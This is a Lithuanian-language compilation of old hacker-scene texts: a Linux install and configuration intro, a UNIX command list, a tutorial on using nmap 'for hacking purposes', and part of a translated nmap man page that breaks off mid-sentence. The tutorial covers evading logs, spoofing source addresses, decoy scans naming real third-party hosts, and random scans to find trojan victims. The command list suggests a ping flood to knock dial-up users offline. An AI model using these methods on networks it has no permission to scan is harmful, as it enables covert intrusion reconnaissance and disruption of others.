Seniau Unix tipo operacines sistemos buvo gan brangios ir buvo sunku gauti jos pradinius kodus arba nebuvo ju galima keist. Tad vienas studentas suomis, Linus Torvalds sugalvojo parasyti savo operacines sistemos branduoli, kuris butu
laisvai platinamas, butu galima keisti jo pradinius kodus ir t.t. Tad X-o desimtmecio pradzioje pasaulis isvydo nauja OS, kurios branduoli sudare 10 000 Linus`o parasytu C kalbos eiluciu. Kiekvienas galejo laisvai gauti sio branduolio koda, kiekvienas galejo ji tobulinti, taisyti klaidas. Ir stai- greitai Linux populiarumas pradejo augti. Vis dazniau ji imta naudoti serveriuose. Daugelis programuotoju ja tobulina. Beje, visa tai jie daro dykai, savo ir kitu labui.
3. Linux instaliavimas
Patarimas: jei jus norit tureti be Linux savo kompiuteryje ir windows- pirmiau instaliuokite windows (nepamirskit palikti atskira skirsni Linux), o poto Linux.
Visu pirma norint instaliuoti Linux, reikia apsispresti kokia Linux distribucija instaliuosite. Ju yra daugelis: Debian, RedHat, Open Linux, Mandrake, SlackWare ir kt. Jos skiriasi savo programu paketais ir siektiek savo konfiguravimu. RedHat dazniausiai naudojama pradedanciuju, nes joje yra rpm- greitas, patogus programu instaliavimo budas.
Apsisprendus kokia distribucija naudosit reikia is Linux CD pasidaryti pakrovimo diskeli (dazniausiai su programa rawrite.exe).
Instaliavimas pradedamas uzkrovus kompiuteri is to diskelio. Tada reikia nurodyti is is kur instaliuosite (kieto disko, tinklo, cdrom), kokia kalba naudosite, kokia klavetura turite ir pan.
Linux`ui skirtingai nei MS-DOS, windows reikia ne vienos particijos, o maziausiai dvieju: root particijos ir swap particijos. root particijoj laikomas Linux branduolys ir kiti jam reikialingi failai. swap particija naudojama laikiniems failams kuriti, taip kaip windows`u swap failas. Swap particija geriausiai kutri dvigubai didesni nei jusu RAM kiekis. Tada kompiuteris gales vykdyti programas kurioms reikia daugiau atminties negu jusu RAM. Jei jus instaliuosite Linux tik i sias dvi particijas jusu sistema bus tarsi skardineje. Norint kad taip nebutu reikia sukurti daugiau particiju: /home, /tmp, /usr. /home particijoj saugomi visi vartotoju failai, tad jo dydis priklauso nuo vartotoju skaiciaus ir ju poreikiu. /tmp particija panaciai kaip ir swap particija laiko laikinus failus. Skirtumas tas kad tmp particijoje laikomi paciu
programu laikini failai, o ne branduolio (kernel). /usr particijoje saugoma visos nesistemines programos, bei kiri joms skirti failai. /usr particijos dydis priklauso nuo vartotoju reikalingu programu, bet is patirties zinau kuo daugiau skirsite siam skirsnui vietos tuo geriau.
Beje, patarimas: Is karto apgalvokite ko jus norite, kiek viskas gali uzimti ir t.t., nes:
1.jei skirsnis (ypac /tmp) koks prisikemsa tai tada linux`as veikia kaip ant 386.(dazniausiai isvis luzhta)
2. Persigalvojus nera jau taip lengva perskirstyri diska. Jei vienam skirsni pritruko vietos, o kitam jos yra, nubus lengva is vieno
skirsnio vieta perduoti kitam.
Mano disko suskirstymas atrode taip:
/ 150 MB – slesas reiskia root particija.
/tmp 100 MB – tmp particija
100 MB – swap particija neturi mount point`o (pavadinimo pvz. /; /tmp ir t.t).
/home 300 MB – vartotojams skiriau 300 MB (turint omeni, kad ju bus tik du).
/usr 3 GB- skyriau visa likusia disko vieta, nes zinau kad xwindows ryja vieta, o jei noresiu dar ir StarOffice.
Beje, visi skirsniai turi buti Linux Native failu sistemos, tik swap turi buti Linux Swap failu sistemos.
Suskircius diska lieka tik menkniekiai: nurodyti kuriuos paketus instaliuoti, nurodyti tam tikra savo hardware bei jos parametrus
bei ivesti galiausiai root slaptazodi.
Is viso sito dar reiktu isskirti lilo konfiguravima. LILO (linux loader) yra programa kuri pasileidzia pries os uzkrovima ir pati uzkrauna
linux, dos ar kita OS. Jei jusu Linux root skirsnis yra daugiau negu 500 MB nuo disko pradzios LILO (naujoms LILO versijoms giliai nusisivilpt tas 1024-as cilindras-dek kur nori) turite deti i MBR (master boot record), kitais atvejais galite deti kitur. Beto galite nurodyti kokia OS krauti pagal nutylejima, kokios bus OS zymes (Linux pagal nutylejima buna “linux”, windows- “dos”). Taigi jus jau Linux instaliavote i savo kompiuteri. Kaip ji pakrauti? Kai ijungiate kompiuteri isvystate kazka panasaus i:
LILO:
Ten surenkate norimos OS zyme ir spaudziate enter. Jei zymiu nezinot ar nepamenas paspauskoit tab ir jas isvysit.
4. Linux komandos
Is pirmo zvilgsnio Linux konsole yra tas pats kas ir DOS. Bet is tikro jos labai skiriasi. Konsoleje galime daryti visa
ta pati ka ir DOS bei daug daug daugiau: kurti gerus sistemos scenarijus (skriptus), konfiguruoti Linux etc.
Cia pateikiu keleta Linux komandu be kuriu darbas su Linux negalimas:
cd (change directory)- pakeiskti aktyvu kataloga, dos analogas cd.
(atminkit kad Linux yra skirtumas tarp didziuju ir mazuju raidziu)
pwd (print working directory)- parodo aktyvu kataloga.
ls- isveda aktyvaus katalogo failu ir katalogu sarasa.
rm- istrina kataloga.
chsh (change shell)- keitce user`io shell
passwd – pakeicia userio slaptavardi
man (manual)- parodo komandos ar ko kitko aprasyma (manual).
linuxconf – linux sistemos konfiguravimas. [ne komanda, o programa, kitur gali nebut]
setup- linux paketu konfiguravimas, laiko, peles, garso kortos nustamas it t.t.
Kiti dalykai kurie pravers: ~ (tilde) – resikai jusu home kataloga. Tad jei norite gristi i savo home kataloga galite rasyti
cd /home/tavo_useris/ arba cd ~. Na o jei rasysite cd ~user, tai jus busite perkeltas i user userio kataloga.
5. Linux konfiguravimas
Zinot Linux programuotoju posaki: “Kam programuoti jeigu galima konfiguruoti?”. Taigi Linux daug ka reikia atlikti paciam. Visi Linux konfiguraciniai failai yra /etc kataloge arba jusu home kataloge. Tu failu yra daugelis, tad as paminesiu tik keleta:
/etc/passwd – saugo informacija apie Linux vartotojus, ju home katalogus, shell`a ir kt.
/etc/shadow – saugo uzkuodotus vartotoju slaptazodzius.
.bachrc, .bashprofile – bash (Bourne Again SHell) shell`o konfiguraciniai failai.
Kaip konfiguruoti Linux placiau suziosite skaitydami how-to arba manual.
6. Kas yra xwindow?
xwindow yra grafinis linux apvalkalas (X Window linuxistai vadina XFree86, o tikrasis X Windows yra skirtas UNIXUI ir kitiems
pobrangiem *IX’ams, jis juk ne nemokamas ), kuris leidzia dirbti su Linux vizualiomis priemonemis. X Window System, sutrumpintai vadinama X Window arba tiesiog X, yra paremta kliento/serverio architektura. X serveris – grafikos, klaviaturos bei peles draiveriu visuma, leidzianti kelioms programoms (X klientams) rodyti bet ka atskiruose, gal but persidengianciuose languose. Pavyzdiai: XFree86 serveriai (XF86_SVGA, XF86_S3 ir t.t.), Metro X, Accelerated X. Visi X klientai yra lygus, bet vienas is ju lygesnis uz kitus. Jis vadinasi window manageriais. Window managerio paskirtis – duoti kiekvienam langui remeli su pavadinimu, pora arba kelias desimtis mygtuku (uzdarymo, padidinimo ir t.t.), jis pirmas apdoroja klaviaturos bei peles paspaudimus ir leidzia langus nesioti, didinti, iskelti i prieki, aktyvuoti ir taip toliau. Pavyzdiai: Enlightenment, kwm (i KDE), fvwm, Window Maker etc. Toliau lieka tik vartotojo programos. Jos, zinoma, galetu pacios keistis su X serveriu zemo lygio komandomis, bet daug
paprasciau naudoti pilnavertes bibliotekas. Sios biliotekos suteikiaivairiu standartiniu irankiu (vadinamu ‘widget’) – mygtuku, scrollbaru ir t.t. Pavydziai: Xaw (Athena Widget Set), Xaw3d, Motif, Gtk+, Qt. Galu gale beliko desktopai. Desktopo paskirtis – suteikti ivairioms programoms vienoda isvaizda ir naudojima (‘look and feel’). Paprastai desktopa sudaro biblioteka, window manageris ir kruvele bendros paskirties programu (paleidimo panele, failu tvarkykle ir t.t.). Pavyzdiai: CDE, KDE, Gnome.
Galvojo ir bade si teksta SaTaN, koregavo LivDea.
34. UNIX Naujokams
By Craft[Eye] www.underground.lt CraftEye@gmx.net
TAIGI FREE SHELLS(kai kuriu yra puslapiai, kai kuriems rashote newuser
shelle prisijunge su telnet per 23 porta):
havoc.net – Niekas IRC botu neleis det.
pooki.smartec.com – Truputi letas.
nether.net – Labai gerai zhinomas. Taip pat labai uzhbaigtas,
su juo gausite 3 megabaitus vietos. Telnete surinkite newuser.
nyx.net Turesi nusiusti maila tam, kad uzhsiregistruotum.
Negausi daug vietos diske.
suburbia.net Sysadminai parashe tinklo skaneri – ‘Strobe’.
cyberspace.org Originalus shellas – pradedantiesiems bus grazhus
menu.
Ashpool.com Hmm shellas. =]
Arbornet.org Meshlas
TakiWeb.com Dar vienas shellas.
Kai kurios UNIX komandos ir trumpas aprashymas.
alias – leidzhia vartotojui pamatyti esamus aliasus
bdiff – sujungia du didelius failus
bfs – skanuoja dideli faila
cal – parodo kalendoriu
cat – parodo failo turini
cc – c programavimo kalbos kompiliatorius
cd – keicia direktorija
chgrb – keicia failo priklausomybe grupei
chmod – keicia failo atributus
chown – keicia failo priklausomybe useriui
cmp – palygina du failus
comm – sujungia du failus taip kad vienodos eilutes butu pashalinamos
cp – kopijuoja faila i kita vieta
cu – iskviecia kita unix sistema
date – parodo tikslu laika ir data
df – parodo visus prijungtus irenginius tavo mashinoje
diff – ishspauzdina dvieju failu skirtumus
du – parodo direktorijos ishnaudojima vieta blokais
echo – ishveda teksto eilute
ed – paprastas tekso redaktorius
env – nustato aplinkos kintamuosius
ex – tiesiog kitas teksto redaktorius
expr – apsluates a mathmatical formula
find – randa faila
f77 – fortrano programavimo kalbos kompiliatorius
format – paruoshia diskeli
grep – ieshko duomenu tekste
help – parodo pagalba
kill – sustabdo veikianti processa
ln – sukuria nuoroda tarp dvieju failu
lpr – kopijuoja faila i paralelini printeri
ls – parodo visus failus ir katalogus esanchius direktorijoje
mail – leidzhia vartotojui siusti/gauti pashta
mkdir – sukuria direktorija
more – ishveda duomeu faila i ekrana
mv – naudojamas tam, kad pervardintu ar perkeltu direktorijas
nohup – leidzhia komandai veikti net tada kai tu isheini ish shello
nroff – naudojamas tam, kad formatuoti teksta
passwd – pakeichia tavo passworda
pkgadd – instaliuoja nauja programa tavo mashinoje
ps – parodo shiuo metu dirbanchius procesus
pwd – parodo aktyvia direktorija kurioje tu dirbi
rm – trina nurodyta faila
rmdir – trina nurodyta direktorija
set – parodo visu kintamuju esanchiu shell’e vardus
setenv – nustato aplinkos kintamuosiu
sleep – padaro veikenti procesa neaktyvu
source – leidzhi paleisti faila ir pakeisti bet kurias pasikeitusias
reikshmes faile
sort – surushiuoja failus
spell – ieshko rashybos klaidu norodytame faile
split – padalina faila
stty – nustato terminalo parametrus
tail – ishspauzdina failo gala
tar – nukopijuoja visus nurodytus failus i viena
touch – sukuria nauja tuschia faila arba nustato laika/data failui
troff – ishveda suformatuota ishvesti =]
tset – nustato terminalo tipa
umask – nurodo nauja sukurimo mask’a
uniq – palygina du failus
uucp – unix i unix paleidimas
vi – editorius per visa ekrana
vipw – atidaro vi editoriu taip kaip password fiaila redagavimui
volcheck – patikrina ar yra prijungtas diskelis prie tavo mashinos
wc – skaichiuoja failo, zhodzhius, eilutes ir t.t.
who – informacija apie kita zhmogu online
write – nusiunchia zhinute kitam vartotojui
sleep – nieko nedaro tam tikra laiko tarpa
logname – parodo logo varda
dd – vygdo keitimus kopijuojant
du – parodo kiek vietos sunaudota
mount – montuoja failines sistemas
cut – ishtraukia pasirinktas failu dalis
fold – perkelia ilgas eilutes
join – apjungia eilutes ish skirtingu failu
od – dvejetainis dampas
paste – apjungia failu eilutes
pr – skaido failus i puslapius
sort – rushiuoja duomenis failuose
strings – ishgauna teksta ish failo
sum – skaichioja galutine kotroline suma
tr – keichia simbolius
basename – ishgauna failo varda ish pilno kelio
dirname – ishgauna direktorijos varda ish pilno kelio
false – grazhina reikshme false(nedaro nieko 🙂
true – grazhina reikshme true(nedaro nieko 🙂
groups – ishveda duomenis apie vartotoju priklausomybe grupems
hostname – parodo tikslius duomenis apie vartotoja
nice – nustato esamo proceso prioriteta
pathchk – patikrina kelius
printenv – ishveda aplinkos kintamuosius
stty – parodo arba pakeichia terminalo parametrus
su – ledzhi tapti kitu vartotoju
tee – sukuria keleta ishvedimo kanalu
test – patikrina faila ir simboliu eilute
tty – ishveda terminalo pavadinima
uname – ishveda duomenis apie operacine sistema ir pan.
users – parodo dabar esanchius vartotojus prisijungusius prie sistemos
who – pasako kokie vartotojai uzhregistruti ir t.t.
whoami – parodo kas per vienas(velnias;) tu esi
man – parodo pagalba apie, bet kuria komanda – dazhniausiai naujoku
naudojama
komanda =]
! – pakartoja komandas
——————————————————————————
Network komandos:
telnet – telnetas tavo shelle
who – parodo kas yra prisijunges prie LAN
netstat – prisijungimu statistikos
finger – informacija apie tinklo vartotojus
ping – skirta tikrinti ar yra ryshys su tam tikra mashina(daugelis
naudoja ja kokiams nors serveriui pakabinti ar ishmesti ish dial-up,
jei greitas ryshys tai suvede komanda ping -c 50000 127.0.0.1 tikriausiai
dial-up niekada neatlaikys =)
ftp – leidzhia parsisiusti/siusti failus
whois – informacija apie interneto mazgus
nslookup – more informacija apie interneto mazgus
dig – tas pats kas ir nslookup tik dar daugiau, jei panaudosite
tinkamus raktus galite ishtraukti neblogos informacijos
—————-End Of Commands List
Na zhodzhiu dabar jau palieku ash jus vienus ir darykit ka jus norit
su tuo UNIX – svarbiausia darykit.
Na shiam kartui tiek..
Craft[Eye] : UNIX rulezz if you rule UNIX =]
EOF
General Protection Fault.. Kernel Panic.
35. Nmap’o panaudojimas hack’o tikslais
1.Info
Jei rimčiau susidomėsite darbu su nmap’u, tuomet būtinai apsilankykite siame saite:
http://www.insecure.org/nmap.
2.Kas yra nmap’as ?
Nmap’as tai tinklo skenavimo programa.Jo pagalba jūs galite tikrinti savo, bei kitų
tinklų saugumą.Tiksliau jūs galite skanuoti portus, bei suzinoti ar juos dengia koks
nors firewall’as.Taip pat galima su nmap’u galima nustatyti kito kompiuterio operacinę
sistemą, tereikia tik ip adreso ir aišku interneto ryšio.
3.Trūkumai ir bugai
Daugumą šiame dokumente aprašytas funkcijas galima atlikti tik iš root’o.Tai
galima sakyti yra pats didžiausias šios programos trūkumas ar bugas.
4.Pradedam
Dokumentas parašytas pagal 2.3BETA14 versiją.
Primiausia reikia atsisiūsti šia programą.O poto atlikti šiuos veiksmus:
# cp nmap-2.3BETA14.tar.gz /usr/local/src
# cd /usr/local/src/
# gunzip nmap-2.3BETA14.tar.gz
# tar -xvf nmap-2.3BETA14.tar
# rm nmap-2.3BETA14.tar
# cd nmap-2.3BETA14/
# more INSTALL
# ./configure && make && make install
# rm -rf nmap-2.3BETA14/
Lets go !
5.Komandų sintaksė yra tokia
# nmap [skanavimo tipas(ai)] [opcijos]
5.1. Skanavimo tipai
Manau šis tipas hackeriams beveik nereikalingas.Nmap’as jungiasi prie kiekvieno
-sT porto iš eilės.Todel viskas loginama loguose ir tave tikrai suseks.Šis būdas yra tiksliausias
bet ir pavojingiausias.TCP connect skanavimas.
Šis būdas jau saugesnis tačiau ne visada , pvz jei stovi firewall’as.Skanuojant tokiu būdu
-sS nėra padaromas TCP prisijungimas, o paprasciausiai nusiunciamas TCP SYN paketas kaip norint
prisijungti ir laukiama atsakymo.TCP SYN skanavimas.
-sF, -sX, -sN
Tai saugesnis už TCP SYN skanavima bet turi vieną labai rimtą trūkumą.Nei vienas iš jų neveikia
Microsoft sistemoms.Stealth FIN, Xmas Tree bei Null skanavimo režimai.
-sU UDP portų skanavimas, beprasmiškas naujoms sistemoms.Ir trunka labai ilgai.
5.2 Bendrosios opcijos ( Štai ir pats smagumas prasideda)
-P0 Skanuoja išarto nebandęs prieš tai pinginti hosto.Reikalingas tokiems servams kurie neatsakinėja
į ICMP echo request’us ( pvz. pop.takas.lt)
-O Zjbiškiausia nmap’o funkcija.Atpažįsta kompo OS pagal jo fingerprint’us.
-oN
Viską kas vyksta ekrane logina i nurodytą failą.
-iR Dar viena labai cool nmap’o funkcija.Pats nmap’as generuoja bet kokius ip adresus ir
skanuoja nurodytus portus.Jei ieškote kokiu trojanų auku tiesiog rašykite
nmap -sS -iR -p 1234(portas) 127.0.0.1.
-p
Galite nurodyti kuriuos ar kurį portą tikrinti.
-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 port
-D
Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu
metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti
5-10 skanavimų is unikalių IP adresų, bet kuris iš jų skanuoja
iš tikro jie pasakyti negalės.
Reikia atskirti vien1 decoy nuo kito kableliais be tarpo, tarp jų gali
įrasšyti ME, tai bus tavo IP adresas.Jei neįrašysi ME, tai nmap’as parinks
vietą tavo IP pats.
Tik reikia prisiminti, kad decoy įrašyti hostai turi būti gyvi, kitaip
gali uz-SYN-flood’inti taikinį.Beto labai nesunku bus surasti tave, jei tik
tavo IP bus gyvas iš visų decoy’ų.
Reikia pasakyti kad kai kurie portų skanavimo detektoriai gali išviso uždrausti priėjimą
skanuojantiems hostams.Todėl būtų linksma jei kartą nurodytumėt vieną iš decoy’ų pvz. 127.0.0.1
Decoy gali būti naudojamas kartu su ping, tikru portų skanavimu ar su OS nustatymu (-O).
-S
Kartais nmap’as gali nerasti jūsų adreso.Tokiu atveju galima naudoti -S funkciją su jūsų IP ir
interfeisu kuriuo norite siūsti paketus.
Tokiu būdu galite nurodyti kieno nors kito ip adresą ir isdurti taikinį,
-e Interfeisas
Pvz. eth0, lo, ppp0 ir kt.
-g Nurodo is kokio porto skanuoti.
-T
Paranoid pats lečiausias skanavimo būdas, bet ir tiksliausias, Insane pats greičiausias, tačiau
ne toks tikslus.
5.3.Pavyzdžiai
# nmap -sX -e lo -P0 -S 127.0.0.3 localhost
Xmas Tree būdu aš skanuoju savo localhost’ą apsimesdamas 127.0.0.3.Loopback interfeisu.Va ką
rodo ipchains’ų logas:
Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139
L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)
Kernelis įsitiknęs kad jį skanuoja 127.0.0.3.
# nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/mad -p 1-1024 -O mad.com
Null skanavimo režimu , panadodamas du decoy adresus, viską logina į /tmp/mad failą.Skanuoja
nuo 1-1024 portus ir bando atspėti OS mad.com serverio.
6.Pabaigai
Na pvyzdžių man atrodo daug nereikia jei turite lakią fantaziją jų prisigalvosite patys.
Wrote by Z-Man (z-man@scientist.com)
Nmap network security scanner man page (Lithuanian translation)
36. NMAP (2)
PAVADINIMAS
nmap – tinklo tyrinėjimo įrankis bei saugumo skeneris
SINTAKSĖ
nmap [skanavimo tipas(ai)] [opcijos]
APIBŪDINIMAS
nmap’as yra sukurtas tam, kad leistų sistemų administrato
riams bei smalsiems individams skanuoti didelius tinklus,
siekiant nustatyti kokie hostai yra veikiantys ir kokias
paslaugas jie siūlo. nmap’as turi be galo daug skanavimo
technologijų, tai: UDP, TCP connect(), TCP SYN (pusiau
atviras), ftp proxy (bounce ataka), Reverse-ident,
ICMP(ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep,
bei Null skan’as. Skanavimo Tipai sekcijoje rasite apie
tai smulkesnės informacijos. nmap’as taip pat turi
nemažai pažangių savybių, tokių kaip nutolusio kompiuterio
(toliau vadinamo ‘remote’) (O)peracinės (S)istemos nus
tatymas per TCP/IP fingerprintinima, stealth (vogtinis)
skanavimas, dinaminės pauzės ir retransimisijos skaičiavi
mai, lygiagretusis skanavimas , nepasiekiamų host’ų nus
tatymas skanuojant lygiagrečiu skanavimo metodu, decoy
skanavimas, filtruojamų portų nustatymas, tiesioginis RPC
skanavimas, fragmentinis skanavimas, bei labai lankstus
taikinio ir portų nurodymas.
nmap’o autorius stengiasi kaip galima daugiau įvairių
nmap’o galimybių suteikti ne tik root vartotojui, bet ir
paprastam sistemos vartotojui, deja daugėlis kritinių sis
temos branduolio (kernel) interfeisų (tokių kaip “raw
socket’ai”) reikalauja root’o privilegijų, todėl nmap’as
turėtų būti naudojamas root’u kai tik įmanoma.
nmap’o naudojimo rezultatas dažniausiai būna paprasčiau
sias sąrašas įdomių portų, rastų skanuojamoje
mašinoje(se). Nmap’as visada parodo kokią paslaugą (ser
vice) teikia portas, jo numerį, būseną bei protokolą.
Būsaną nusako vienas iš trijų žodžių: “open”, “filtered”,
“unfiltered”. “open” (atviras) reiškia, kad taikinys leis
prisijungti prie šito porto. “filtered” (filtruojamas)
reiškia, kad firewall’as (ugnies siena), filtras ar dar
kažkoks įdomus įrankis dengia portą, dėl to nmap’as tikl
siai negali nustatyti ar portas atviras. “unfiltered”
(nefiltruojamas) parodo, kad portas yra tikrai “closed”
(uždarytas) ir nera dengiamas jokio firewall’o/filtro.
Nefiltruojamas portas yra gan įprastas atvėjis ir yra
rodomas tik tuo atveju, kai dauguma iš skanuotų portų yra
filtruojami.
Priklausomai nuo to, kokios opcijos naudojamos, nmap’as
taip pat gali parodyti ir nutolusio kompiuterio:
(O)peracinę (S)istemą, TCP susekamumą, vartotoju vardus,
kuriems priklauso tam tikri procesai, DNS vardus ir dar
vieną kitą.
OPCIJOS
Prasmingos opcijos visos gali būti rašomos kartu (t.y.
vienoje eilutėje). nmap’as stengsis pasakyti, kokias
klaidas esate padarę (aišku jei esate :).
Jei esate nekantrus, galite iškarto šoktelti į sekciją
pavyzdžiai gale dokumento, kur gan aiškiai parodo naudo
jimą. Taip pat galite paleisti nmap -h ir pamatysite
pagrindines opcijas, su trumpais aprašymais.
SKANAVIMŲ TIPAI
-sT paprasčiausias TCP connect() skanavimas. Jūs ban
dote prisijungti prie kiekvieno porto iš eilės. Jei
portas klausosi, nmap’as prisijungia prie jo, taigi
jei host’as logina, jis matys, kad bandote jungtis.
Šis metodas yra tiksliausias, bet rekomenduočiau jį
naudoti tik tuo atveju, jei skanuojate savo ar
draugo kompiuterį, t.y. tokį, dėl kurio vėliau
tikrai nesusilauksite nemalonumų.
-sS TCP SYN skanavimas, kitaip dar dažnai vadinamas
kaip “pusiau-atviras” skanavimas, nes nėra padaro
mas TCP prisijungimas. Jūs paprasčiausiai
nusiunčiate TCP SYN paketuką kaip kad norėdamas
prisijungti ir laukiate atsakymo. Pakankamai neblo
gas metodas, bet jei yra filtruojamų portų (pvz.
pastatytas firewall’as) ir host kompiuteris juos
logina, – būsite pastebėtas.
-sF -sX -sN
Stealth FIN, Xmas Tree bei Null skanavimo režimai.
Tai yra šiek tiek saugesni skanavimo būdai nei TCP
SYN (pastebimumo atžvilgiu), bet deja nei vienas iš
jų neveikia M$ sistemoms. Iš kitos pusės, tai
nebloga priemonė, kurios pagalba galima nustatyti
ar tai M$ sistema ar ne, t.y. jei -sF -sX arba -sN
parodo, kad visi portai uždaryti, o -sS rodo kelis
atvirus portus, taikinys greičiausiai windows
dėžutė.
-sP Tai paprasčiausias ping’as, kuris parodo kurie
hostai tinkle yra gyvi. Atliekama paprasčiausiai
siunčiant ICMP echo prašymą (request). Deja kai
kurie saitai (kaip mail.takas.lt) blokuoja
prašymus. Kad iš tikro įsitikinti, ar hostas negy
vas, nmap’as nusiunčia ir TCP ack paketuką į 80
(standartiškai) portą. Jei gauname atgal RST,
reiškia hostas gyvas. Pagal standartą (r00t’ui)
nmap’as naudoja abu ICMP bei ACK metodus. Pakanka
mai efektyvu, nes vienu metu galite patikrinti #n
hostų.
-sU UDP skanavimas. Naudojamas tam, kad nustatyti kokie
UDP (User Datagram Protocol, RFC 768) portai yra
atviri.
Kai kurie mano, kad UDP skanavimas yra
beprasmiškas, bet jį prisiminti verta vien dėl
vienos Solaris rcpbind skylės. Taip pat yra cDc
Back Orifice trojanas, kuris atsidaro UDP portą ant
window’sų. Gaila tik, kad UDP skanavimas kartais
gali trukti labai ilgai.
-sA ACK skanavimas: šitas metodas paprastai yra naudo
jamas tam, kad išsiaiškinti firewall’ų (ugnies
sinų) taisykles. Jis gali padėti nustatyti ar fire
wall’as tikras, ar paprasčiausias paketų filtras,
blokuojantis įplaukiančius SYN paketukus.
-sW Window skanavimas. Šis skanavimo būdas labai
panašus į ACK skaną, skirtumas tik tas, kad šis
skanavimo metodas kartais parodo ir atvirus portus
(ACK jų nerodo).
-sR RPC skanavimas. Praskanavus parodoma kokia programa
ir jos versija laiko RPC portus atvirus.
-b
Dar vienas pakankamai originalus skanavimo būdas,
t.y. pasinaudojant ftp proxy serveriu. formatas gali būti useris:passwor
das@serveris:portas . Viskas išskyrus serverį yra
nebūtina.
BENDROSIOS OPCIJOS
Nei viena iš šių nėra būtina, bet kai kurios gali
būti pakankamai naudingos
-P0 Skanuoti iš kart, nepabandžius iš pradžių ping’int
serverio. Tai naudinga skanuojant tokius kaip
mail.takas.lt, kurie neatsakinėja į ICMP echo
request’us. Tokiu atveju reikėtų naudoti -P0 arba
-PT80.
-PT Naudoti TCP “ping’ą” vietoje standartinio ICMP
ping’o. Naudinga tokiais atvejais, kai serveris
neatsakinėja i ICMO echo request’us. Taip pat gal
ima naudoti kartu su postu (-PT).
-PS Naudoja SYN (prisijungimo prašymą) vietoje ACP
-PI Paprastas ping’as + suranda subnet’o broadcast’u
adresus tinkle.
-PB Standartinis ping’inimo metodas: naudoja ACP bei
ICMP ping’us kartu. Geriausia būdas patikrinti
firewall’us, kurie blokuoja vieną iš jų.
-O Viena geriausių nmap’o ypatybių – serverio OS’o
atpažinimas pagal jo fingerprint’us (jei atvirai,
pats nelabai žinau kas per biesas tie finger
printai).
-I Įjungiamas TCP reverse ident skanavimas. Kaip 1996
Dave’as Goldsmith’as pastebėjo, ident protokolas
(rfc 1413) leidžia pamatyti, kokiam useriui prik
lauso procesas, kuris naudoja TCP susijungima.
Taigi, tu gali pvz prisijungti prie 80 porto ir
tada pasinaudojes inentd’u, gali pamatyti ar http
serveris yra paleistas root’u ar kokiu kitu
userium.
-f Skanuojant SYN (-sS) , FIN (-sF), XMAS (-sX) arba
NULL (-sN) metodu, naudojami labai mažyčiai sufrag
mentuoti IP paketai.
-v Verbose mode. Labai rekomenduojama opcija, ypač jei
norit geriau suprasti kas čia dedasi. naudodamas
šią opciją du kartus, efektas bus dar geresnis.
Gali naudoti ir dvigubą -d, efektas – nerealus.
Nepabandęs, nesuprasi.
-h Jei norite kad nedidelis langelis jums trumpai
primintu kelias pagrindines komandas, ši opcija –
jums.
-oN
Viskas, kas vyksta ekrane bus loginama į “logas”
failą.
-oM
Viskas, kas vyksta ekrane bus loginama į failą
“logas” “šiek tiek” kitokiu formatu.
-oS
Logina į failą “logas” kažkokiu nauju s|
Skanavimas, kuris buvo nutrauktas su ^C, gali būti
pratęstas, su sąlyga, kad viskas buvo loginama su
-oN arba -oM opcija. Daugiau jokie parametrai
negali būti pateikti (jie bus tokie, kokie buvo
naudojami loginant). nmap’as pradės skanuoti nuo
sekančios mašinos, po tos, kuri paskutinė buvo
sėkmingai nuskanuota..
-iL
Nuskaito hostus (IP adresus) iš failo “failas”.
Hostai faile turi būti atskirti tarpais, TAB’ais
arba atskirose linijose. deja opcijų nurodyti jokių
negalite tame faile, užtat yra galimybė jas
nurodyti komandinėje eilutėje.
-iR Šita opcija priverčia nmap’ą generuoti atsitik
tinius hostus. Jei kada neturėsite ką veikti,
pabandykite `nmap -sS -iR -p 80′, kad surastumėte
keletą www serverių.
-p
Galite nurodyti kurį/kuriuos portus tikrinti. pvz.
-p 110 patikrins ar hostas turi pop3 serverį, taip
pat galite mišriai nurodinėti portus:
-p 21,60-90,1243 — 21, visi nuo 60 iki 90
bei 1243 portas
-p 1- — visi portai nuo 1 iki
65535.
-F Greitasis metodas. Skanuoja tik tuos portus, kurie
nurodyti nmap’o services faile (pagal default’ą –
/usr/local/lib/nmap/nmap-services)
-D
Decoy skanavimas priverčia skanuojamą host’ą
manyti, kad jį vienu metu skanuoja visi nurodyti
decoy’iai. Hostų logai gali parodyti 5-10 skanavimų
iš unikalių IP adresų, bet kuris iš jų skanuoja iš
tikro jie pasakyti negalės.
Atskirk kiekvieną decoy’į kableliais (be tarpo) ir
gali tarp jų įterpti ‘ME’ kaip vieną iš decoy’ių.
nmap’as ten įterps tavo adresą. Jei šito
nenurodysi, nmap’as atsitiktinai išrinks tau vietą.
Tiesa, jei ‘ME’ įrašysi 6-oje ar dar vėlesnėje
vietoje, kai kurie skanavimų detektoriai (tokie
kaip Solar Designer’io nepakartojamas scanlog dae
mon’as) gali tavo IP išviso neparodyti.
Nepamiršk, kad hostai, kuruos naudosi kaip
decoy’ius, turi būti gyvi, kitaip gali už-SYN-
flood’inti taikinį, o be to labai nesunku bus
surasti skanuotoją, jei jis bus vienintelis gyvas
visame tinkle.
Atkreipk dėmesį ir į tai, kad kai kurie (durnesni)
portų skanavimų detektoriai gali aplamai skanuo
jantiems host’ams uždrausti priėjimą. Įsivaizduok,
kas gali nutikti, jei vieną iš decoy’ių nurodytum
“localhost’ą” 🙂
Decoy skanavimas gali būti naudojamas kartu su ping
(naudojant ICMP, SYN, ACK, ar dar ką nors) arba
tikru portų skanavimu bei bandant surasti remote
OS’ą ( -O ).
-S
Kartais nmap’as gali nerasti jūsų adreso. Tokiu
atveju galite naudoti -S opciją su jūsų IP adresu
bei interfeisu, kuriuo siūsite paketus.
-e
Nurodo nmap’ui kokiu interfeisu siųsti paketus.
(lo, ppp0, eth0 ir etc.)
-g
Nurodo iš kokio porto skanuoti. Daugelis firewall’ų
bei filtrų padaro išimtis DNS (53) bei FTP-DATA
(20) paketams.
-r Nurodo nmap’ui portus skanuoti NE atsitiktine
tvarka.
-M
Nustato naksimalų susijungimu skaičių, kuris bus
naudojamas paralelėje su TCP(standartiškai) skanav
imu.
LAIKO APRIBOJIMAI
-T
Paranoid – pats lėčiausias skanavimo būdas, Insane
– pats greičiausias, deja ne toks tikslus, ypač jei
tinklas lėtas. Vietoj žodžių galite naudoti ir -T
